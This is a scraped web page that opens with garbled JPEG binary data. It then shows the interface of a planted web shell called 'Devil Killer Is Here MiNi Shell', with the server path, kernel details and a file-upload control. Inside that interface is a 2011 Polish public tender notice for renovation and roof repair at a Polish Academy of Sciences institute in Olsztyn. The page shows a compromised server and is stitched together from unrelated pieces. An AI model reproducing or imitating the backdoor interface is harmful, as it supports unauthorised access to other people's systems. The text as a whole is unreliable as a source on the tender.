JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111006/322724-N-2011.html

<p class="kh_header"><b>Olsztyn: Wykonanie robót instalacyjno-budowlanych w budynku Instytutu Rozrodu Zwierząt i Badań Żywności przy ul. M. Skłodowskiej-Curie w Białymstoku, 
wraz z dostawą i montażem mebli oraz robót budowlanych w budynku Instytutu Rozrodu Zwierząt i Badań Żywności PAN w Olsztynie przy ul. Bydgoskiej 1/8 obejmujących remont dachu wraz z kominami</b><br>
<b>Numer ogłoszenia: 322724 - 2011; data zamieszczenia: 06.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk , ul. Tuwima 10, 10-747 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5234692, faks 089 5234693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pan.olsztyn.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót instalacyjno-budowlanych w budynku Instytutu Rozrodu Zwierząt i Badań Żywności przy ul. M. Skłodowskiej-Curie w Białymstoku, 
wraz z dostawą i montażem mebli oraz robót budowlanych w budynku Instytutu Rozrodu Zwierząt i Badań Żywności PAN w Olsztynie przy ul. Bydgoskiej 1/8 obejmujących remont dachu wraz z kominami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: wykonanie robót remontowych i instalacyjnych  (instalacja elektryczna i informatyczna)w pomieszczeniu dla Zakładu Biologii i Patologii Rozrodu Człowieka wraz z dostawą i montażem mebli oraz robót budowlanych w budynku Instytutu Rozrodu Zwierząt i Badań Żywności PAN w Olsztynie przy ul. Bydgoskiej 1-8 obejmujących remont dachu wraz z kominami. Przedmiar robót wykonany dla przedmiotu zamówienia oraz specyfikację mebli umieszczono w Załączniku nr 1a do SIWZ, dla robót - remont dachu z kominami, przedmiar robót umieszczono w załączniku nr 1b. Zamówienie podzielono na dwie Części:
Część 1 - Roboty budowlano instalacyjne wraz z dostawą i montażem mebli
Przedmiar uwzględnia roboty budowlane, elektryczne, sanitarne oraz informatyczne takie jak: roboty rozbiórkowe, położenie tynków na ścianach, szpachlowanie ścian, remont posadzki cementowej, malowanie ścian i sufitów, ułożenie posadzki, wykucie ościeżnicy i wstawienie okna, demontaż urządzeń sanitarnych wraz z korkowaniem  podejść dopływowych i odpływowych, zamocowanie umywalki, rozebranie ścianek pełnych, wstawienie okna i drzwi balkonowych, uzbrojenie istniejących drzwi wejściowych w zamek kodowany cyfrowo, remont instalacji elektrycznej i informatycznej, wywiezienie gruzu. Dostawa i montaż mebli obejmuje: biurka komputerowe szt.9, regały na segregatory szt. 5, szafki wiszące nad biurkiem szt. 6, szafka z blatem pod ksero szt. 1, aneks kuchenny szt. 1 oraz obudowa rur c.o. - szt. 1
Część 2 - Remont dachu wraz z kominami
Przedmiar uwzględnia roboty budowlane tj. remont kominów i połaci dachowej, wraz z instalacją odgromową. 
W celu zapewnienia współpracy z wykonawcą i prowadzenia kontroli wykonywanych robót budowlanych oraz dokonywania odbiorów , zamawiający przewiduje ustanowienie osoby upoważnionej do zarządzania realizacją umowy oraz inspektorów nadzoru w zakresie wynikającym z ustawy Prawo budowlane i postanowień umowy.

Zamawiający ustala następujące rodzaje odbiorów :
- odbiór robót zanikających i ulegających zakryciu
- odbiór częściowy
- odbiór końcowy
- odbiór po okresie rękojmi
- odbiór ostateczny po okresie gwarancji.
Sprawdzeniu i kontroli będą podlegały :
- jakość i dokładność wykonania prac zanikowych
- jakość i dokładność wykonania prac wykończeniowych
- prawidłowość funkcjonowania zamontowanych urządzeń i wyposażenia
- poprawność połączeń funkcjonalnych , wydajność przesyłowa i szczelność (próby ciśnieniowe) w sieciach i instalacjach.
Oferowane meble wraz z montażem muszą spełniać wymagania w zakresie wymiarów, rodzaju materiału, dodatkowego wyposażenia opisanego w załączniku nr 1a do SIWZ. Materiały, z którego będą wykonane meble muszą posiadać atesty lub certyfikaty wydane przez odpowiednie instytucje atestujące lub certyfikujące, dopuszczone do obrotu na terenie RP lub UE.
Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
Zaproponowane urządzenia, wyposażenie meblowe oraz zastosowane do wykonania robót budowlanych materiały muszą być nowe, nieużywane a ich parametry techniczno-funkcjonalne nie niższe niż przedstawione w załączniku nr 1a i 1b do siwz - przedmiar robót i opis przedmiotu zamówienia.
Wymagany przez Zamawiającego minimalny okres gwarancji i rękojmi- co najmniej 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót budowlanych i instalacyjnych. Termin udzielonej gwarancji na meble nie może być krótszy niż 24 miesiące od dnia jego dostawy, na urządzenia sanitarne nie krótszy niż 12 miesięcy.

Warunki ogólne: 
1.	Wszystkie zastosowane materiały muszą posiadać świadectwa dopuszczenia Instytutu Techniki Budowlanej. Materiały stosowane do wewnątrz muszą posiadać świadectwa dopuszczenia Państwowego Zakładu Higieny.
2.	Zamawiający udostępnia przedmiar robót, który stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia - Załącznik nr 1a i 1b. Przedmiar stanowi materiał pomocniczy do sporządzenia oferty. Ilości obmiarowe jak również zestawienie materiałów są ilościami przybliżonymi i uśrednionymi i mogą różnić się od ilości rzeczywistych w zależności od zastosowanych rozwiązań materiałowych oraz przyjętych technologii wykonywania robót. Wobec powyższego przedmiar robót należy traktować orientacyjnie i nie stanowi on oferty na wykonawstwo. Stanowi dokument pomocniczy do weryfikacji otrzymanych ofert.
3.	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z należytą starannością, zgodnie z obowiązującymi normami i przepisami prawa, zasadami współczesnej wiedzy technicznej i uzgodnieniami dokonanymi w trakcie realizacji robót.
4.	Wykonawca udzieli gwarancji na wszystkie prace budowlano-instalacyjne a na materiały i urządzenia zgodnie z kartą gwarancyjną producenta. Wymagany przez Zamawiającego minimalny okres gwarancji i rękojmi - co najmniej 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót budowlanych i instalacyjnych. Termin udzielonej gwarancji na meble nie może być krótszy niż 24 miesiące od dnia jego dostawy, na urządzenia sanitarne nie krótszy niż 12 miesięcy.
5.	Wykonawca dostarcza wszystkie materiały niezbędne do wykonania zamówienia. Wszystkie zakupione przez Wykonawcę materiały powinny posiadać zaświadczenie o jakości lub atesty oraz odpowiadać jakościowym i gatunkowym wymaganiom określonym w specyfikacji technicznej wykonania i odbioru robót.
6.	Pozostałe wymagania stawiane Wykonawcy:
- Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
- wymagana jest należyta staranność przy realizacji zobowiązań umowy,
- prace budowlane i rzemieślnicze winny być wykonywane zgodnie z zasadami sztuki budowlanej oraz obowiązującymi w tym zakresie przepisami prawa i normami,
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia,
- wszelkie ustalenia i decyzje dotyczące wykonywania przedmiotu zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy,
- określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.31.43.20-0, 39.10.00.00-3, 45.32.00.00-6, 45.26.26.00-7, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustanawia wadium w wysokości 900,00 zł (słownie: dziewięćset złotych) dla Części 1; 1200,00 zł (słownie: jeden tysiąc dwieście złotych) dla Części 2.
1)	Wadium może być wnoszone w:
2.1. pieniądzu na konto Zamawiającego w banku BGŻ Oddz. Olsztyn
nr konta 17 2030 0045 1110 0000 0045 2110, z dopiskiem przetarg ZP-PNK RB 2011 010 20
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3. gwarancjach bankowych,
2.4. gwarancjach ubezpieczeniowych,
2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 2 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U Nr 109, poz.1158 z późniejszymi zmianami),
2)	Termin wniesienia wadium w pieniądzu zgodny z terminem składania ofert.
3)	Wadium wniesione w innej formie niż pieniężnej powinno być załączone do oferty w oddzielnej kopercie z napisem wadium. Wadium wpłacone w formie pieniężnej - należy załączyć dowód wpłaty wadium.
4)	Zamawiający zwraca wadium niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnienia postępowania z wyjątkiem Wykonawcy, którego oferta została uznana za najkorzystniejszą.
5)	Wykonawcy, którego oferta została uznana za najkorzystniejszą, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
6)	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr  2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr  2  oraz  nr 4 do SIWZ - Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dwóch robót budowlanych i/lub instalacyjnych, każda na kwotę nie mniejszą niż 30000,00 zł, w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbioru, oraz załączeniem dokumentu potwierdzającego, że te roboty budowlane zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr  2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr  2 do SIWZ oraz nr 5 do SIWZ tj. Wykonawca wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonaniu zamówienia odpowiedzialnymi za kierowanie robotami budowlanymi oraz posiadającymi wymagane kwalifikacje zawodowe i wykształcenie, niezbędne do wykonania zamówienia.
-wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami,
-oświadczenie, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi uprawnienia wykonawcze w branżach:
a)	budowlanej (Część 1 i 2),
b) instalacyjnej (Część 1 i 2),
c) elektrycznej (Część 1),
-jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz, że osoba odpowiedzialna za kierowanie robotami budowlanymi posiada wymagane kwalifikacje zawodowe i wykształcenie, niezbędne do wykonania zamówienia, tj. 
a)	Kierownik budowy, posiadający uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz wyższe wykształcenie techniczne w specjalności konstrukcyjno-budowlanej oraz wyższe wykształcenie techniczne w branży budowlanej lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim prawem budowlanym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr  2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt. III.4) albo w pkt. III.5)
1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem.
2. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia Formularz Oferty
3. Sporządzony przez Wykonawcę Kosztorys wg wzoru stanowiącego załącznik nr 1a i lub 1b do Specyfikacji Istotnych Warunków Zamówienia Przedmiar Robót.
4. Sporządzone przez Wykonawcę, według wzoru stanowiącego załączniki do specyfikacji istotnych warunków zamówienia, nr 5 -  wykaz osób,  nr 6 - wykaz elementów, których wykonanie Wykonawca zamierza powierzyć podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące:
1.	zmiany  terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej;
2.	zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
3.	przestojów i opóźnień zawinionych przez Zamawiającego;
4.	wydłużenia czasu oczekiwania na uzyskanie pozwoleń lub decyzji administracyjnych i uzgodnień wymaganych dla wykonania umowy, jeżeli łączny czas oczekiwania na pozwolenie i decyzje administracyjne przekroczy łącznie 21 dni;
5.	w przypadku zaistnienia sytuacji wskazanej w pkt. 1- 4 strony ustalają nowy termin realizacji przedmiotu umowy, z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju.  W przypadku zmiany terminu wykonania przedmiotu umowy, Wykonawca zobowiązany jest do przedłużenia terminu ważności zabezpieczenia należytego wykonania umowy.
6.	Zamawiający przewiduje możliwość zmiany w zakresie przedmiotu umowy, w przypadku stwierdzenia konieczności wykonania robót zamiennych lub dodatkowych (niekoniecznych). Informacja o konieczności wykonania ww. robót potwierdzona być musi w protokole robót zamiennych/dodatkowych, zatwierdzonym pisemnie przez Zamawiającego.
7.	Zamawiający przewiduje możliwość zmiany umowy w zakresie osób wyznaczonych do kontaktów między stronami, Kierownika budowy podczas realizacji przedmiotowego zamówienia jeżeli nowo wyznaczone osoby posiadać będą kwalifikacje odpowiadające wymaganiom określonym przez Zamawiającego w specyfikacji istotnych warunków zamówienia oraz zaistniałe zmiany będą wywołane okolicznościami, których nie można było przewidzieć w chwili podpisania umowy.
Wszystkie zmiany wymagają podpisania aneksu do zawartej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
